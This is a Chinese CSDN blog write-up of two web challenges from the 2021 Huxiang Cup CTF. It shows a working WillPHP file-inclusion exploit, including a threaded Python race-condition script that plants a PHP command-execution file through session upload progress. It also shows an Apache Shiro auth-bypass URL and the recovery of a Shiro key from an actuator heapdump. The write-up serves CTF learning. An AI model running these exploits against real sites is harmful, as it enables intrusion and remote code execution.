2021湖湘杯wp_web

最新推荐文章于 2024-04-04 14:32:27 发布
最新推荐文章于 2024-04-04 14:32:27 发布
阅读量4.1k 收藏 4
点赞数 5
分类专栏: CTF 网络安全 文章标签: 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/meteox/article/details/121334507
版权

easywill

will框架,版本是1.51,直接gitee下载源码回退版本即可https://gitee.com/willphp/willphpv2

该框架参考了thinkphp,开头首页给出了assign( n a m e , name, name,value)渲染,然后return了view(),thinkphp有个相关的文件包含漏洞和这个很像

https://www.freebuf.com/column/207878.html

从view->fetch->render->renderTo逐步跟进,发现有变量覆盖,可造成文件包含

image-20211115141800141

$_vars数组是我们可以控制的

image-20211115142102394

所以可以直接包含文件

http://eci-2zej1goyn9jh85zrihq7.cloudeci1.ichunqiu.com/?name=cfile&value=/etc/passwd

然后可以通过条件竞争写文件,再包含即可

import threading
import requests
from concurrent.futures import ThreadPoolExecutor, wait

target = 'http://eci-2zej1goyn9jh85zrihq7.cloudeci1.ichunqiu.com/index.php'
session = requests.session()
flag = 'helloworld'


def upload(e: threading.Event):
    files = [
        ('file', ('load.png', b'a' * 40960, 'image/png')),
    ]
    data = {'PHP_SESSION_UPLOAD_PROGRESS': rf'''<?php file_put_contents('/tmp/meteo4', '<?=`ls /`?>'); echo('{flag}'); ?>'''}

    while not e.is_set():
        requests.post(
            target,
            data=data,
            files=files,
            cookies={'PHPSESSID': flag},
        )


def write(e: threading.Event):
    while not e.is_set():
        response = requests.get(
            f'{target}?name=cfile&value=/tmp/sess_{flag}',
        )

        if flag.encode() in response.content:
            e.set()


if __name__ == '__main__':
    futures = []
    event = threading.Event()
    pool = ThreadPoolExecutor(15)
    for i in range(10):
        futures.append(pool.submit(upload, event))

    for i in range(5):
        futures.append(pool.submit(write, event))

    wait(futures)

这里还可以用pearcmd.php,可看p神文章https://tttang.com/archive/1312/#toc_0x06-pearcmdphp,只能说p神还是ttttql。

image-20211115143043023

读路径和文件可以用内敛执行,或者php的函数print_r(scandir(’/’)),highlight_file,show_source等。

Pentest in Autumn

给了pom.xml,shiro版本1.50,扫描目录发现有/actuator文件,但访问其中的文件就重定向到login

结合shiro鉴权绕过可以成功访问到。

http://eci-2zefc5m7et486fhzmrbj.cloudeci1.ichunqiu.com:8888/;/actuator/env

然后可以下载heapdump文件,可参考文章提取keyhttps://www.cnblogs.com/icez/p/Actuator_heapdump_exploit.html

image-20211115143651237

找到密钥后进行还原

import base64
import struct
str= base64.b64encode(struct.pack('<bbbbbbbbbbbbbbbb',25,56,-57,73,111,12,-81,57,36,114,15,13,84,-56,-96,-89))
print(str)

然后直接用工具打就行

image-20211115143832498

meteox
关注
  • 5
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
专栏目录
湖湘(初赛)
天威一号
11-02 656
目录1、信息系统的安全保护分为五个等级:2、互联网管理者应当记录信息应用者发布的内容和日志信息,不少于几个月? 1、信息系统的安全保护分为五个等级: 1、信息系统的安全保护分为五个等级: 一级:对公民信息造成损害; 二级:对公民信息造成严重损害; 三级:对社会秩序和公共利益造成严重损害; 四级:对社会秩序和公共利益造成特别严重损害; 五级:对国家安全造成特别严重损害; 2、互联网管理者应当记录信息...
在WordPress中使用wp_count_posts函数来统计文章数量
10-23
`wp_count_posts()`函数就是用于解决这一问题的关键工具。它是一个内置的WordPress函数,能够帮助开发者轻松获取不同状态的文章和页面的计数。 `wp_count_posts()`函数的主要作用是返回一个对象,该对象包含了所有...
2021湖湘
qq_48511129的博客
11-24 644
Web easywill 发现这里可以进行本地文件包含 http://eci-2zec2ffu8ckzf4ciogou.cloudeci1.ichunqiu.com/?name=cfile&value=…/…/…/…/…/…/etc/passwd 参考下面链接的pearcmd.php的巧妙利用 https://tttang.com/archive/1312/ 构造payload ?name=cfile&+config-create+/&value=…/…/…/usr/local/li
[湖湘 2021 final]Penetratable
最新发布
2301_80552914的博客
04-04 673
链子:FileViewer -> Backdoor::__destruct() -> FileViewer::__call() -> FileViewer::loadfile() -> FileViewer::curl()链子:aa::_destruct->zz::_tostring->mothod=write&var=content->zz::write()->ff::_get->func=system->xx::_call。可以用admin身份了,但是只能查看用户信息。注册一个admin"#的用户。
2021湖湘easy&&深育WEBLog
Love&Share
11-14 1333
文章目录湖湘easy深育WEBLog 湖湘easy <?php namespace home\controller; class IndexController{ public function index(){ highlight_file(__FILE__); assign($_GET['name'],$_GET['value']); return view(); } } 题目页面最下边有powered by willphp.
2021湖湘 Hideit Writeup
qq_41866334的博客
11-15 3204
2021湖湘 Hideit AAA : immortal 动态调试 直接x64dbg动调找到了关键的加密代码分别是xxtea 和 chacha20,直接动调从中拿出各种参数然后写代码进行解密。其实一开始没看出来chacha20,找到了这篇文章 逆向中常见的Hash算法和对称加密算法的分析 . 解密dll 后来在赛后和队友交流发现这题其实在数据段放了一个加密的dll文件,在解密段可以x64dbg dump出dll的代码。断点下在memncpy上,解密结束后就可以dump出对应的地址,删去pe头之前的
2021第七届湖湘-web-wp
midi
11-15 4176
第七届湖湘-web-wpWeb1 easywillWeb2 Pentest in Autumn Web1 easywill 题目给的附件Pom.xml Pom.xml 中有actuator http://eci-2zedwevdyx4t10vmh85o.cloudeci1.ichunqiu.com:8888/actuator Springboot中actuator常见接口(1.x能够直接访问,2.x是在actuator目录下) 由于没有权限,接下来访问都是302 http://eci-2zedwevdy
wordpress之wp_nav_menu使用说明
09-29
wp_nav_menu()方法位于wp-includes/nav-menu-templates.php文件中。
详解WordPress开发中wp_title()函数的用法
10-23
主要介绍了WordPress开发中wp_title()函数的用法,wp_title可以用来显示文章标题和分类名称等,需要的朋友可以参考下
UNCTF2021 部分wp.pdf
12-10
UNCTF2021 部分 WP 解题报告 本文档对 UNCTF2021 部分 WP 进行了详细的解题报告,涵盖了 WEB、PHP、MYSQL、CRYPTO 等方面的知识点。 1. Fuzz_md5Get 和 Post 传参绕过 在 UNCTF2021WEB 部分中,我们遇到了一...
WordPress导航菜单函数wp_nav_menu()详解
09-29
本文主讲内容是WordPress导航菜单函数wp_nav_menu()详细使用的说明,大家可以看参考一下,在开发WordPress模板时会使用到这个函数自定义菜单
Pentest:用于渗透测试的工具
05-29
渗透测试 用于渗透测试的注释/工具
2019湖湘部分WP
蚁景网安学院
11-12 990
0x01 untar直接访问题目可以看到源码<?php $sandbox = "sandbox/" . md5($_SERVER["REMOTE_A...
湖湘逆向wp
re1wn
11-27 5962
湖湘reverse
2021-湖湘-Web
feng的博客
11-14 4528
前言 总的来说的话,题目质量还是不错的,另外那道XSS也是0解,也幸好自己是一点XSS都不会(寒假补一波),卷是真的卷,还有很多的东西都只停留在表面吧,除了shiro的鉴权绕过是自己之前专门学过的,所以打开pom.xml看到1.5.0的版本立马就知道这题得有个鉴权绕过,别的,剩下的打shiro一开始没打通才换了工具打(后来才发现我一直在拿cc的链子打,我说怎么打不通。。。)。还是慢慢学习了。 easywill 打开页面发现是个WillPHP,而且应该就是assign的模板渲染了,而且根据这个东西和tp有点关
[HXBCTF 2021]湖湘easywill
weixin_45751765的博客
12-01 3655
0x00 前言 这次接触到pear有点陌生 先本地弄弄 参考师傅 https://blog.csdn.net/rfrder/article/details/121042290 啥是Pear? pear (全称为PHP扩展与应用库) 1.如前所述,PEAR按照一定的分类来管理PEAR应用代码库,你的PEAR代码可以组织到其中适当的目录中,其他的人可以方便地检索并分享到你的成果。 2.PEAR不仅仅是一个代码仓库,它同时也是一个标准,使用这个标准来书写你的PHP代码,将会增强你的程序的可读性,复用性,减少
湖湘2018】第一次写wp就写个贼水的吧。。。
KingJerry的博客
11-19 640
昨天去考英语六级口语然后在外面浪一天,然后突然想起来好像有个比赛23333333 匆匆忙忙赶回来已经迟了。。。 行吧。。。   1、题目名 Welcome   关注公众号回复可得flag   2、题目名Disk  先用FTK扫描文件   发现四个flag文件将所有二进制复制下来 01100110011011000110000101100111011110110011...
湖湘-re
qq_37439229的博客
11-02 1149
re1 ibm s/390 看逻辑就是个解方程,z3试一下,原本用bitvec,发现看上去就不怎么对,用int 就好了,真奇怪 from z3 import * table = [0x00, 0x00, 0xB2, 0xB0, 0x00, 0x00, 0x6E, 0x72, 0x00, 0x00, 0x60, 0x61, 0x00, 0x00, 0x56, 0x5D, 0x00, 0x00, 0x94, 0x2D, 0x00, 0x00, 0xAC, 0x79, 0x00, 0x00, 0x39, 0x1
湖湘re
Trick的博客
11-14 190
easy_c++ 长度32 关键字符串 v11是一个个字符 下面异或 写脚本 over python_exp: str = "7d21e<e3<:3;9;ji t r#w\"$*{*+*$|," v13 = '' for i in range(32): v11 = ord(str[i:i+1]) v13 += chr(i ^ v11) v11 ^= i print(v13) java_exp: public class Test { public stat
wordpress 数据表wp_posts,wp_postmeta,wp_terms,wp_term_relationships,wp_term_taxonomy,wp_links,哪些是有用的,哪些是无用的,在注释里标注出来。
02-06
- `wp_posts`:这是 Wordpress 网站中最重要的表之一,用于储存文章、页面、媒体文件等内容。 - `wp_postmeta`:这是一个附加表,用于储存有关文章的元数据,例如自定义字段。 - `wp_terms`:这是用于储存分类、...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值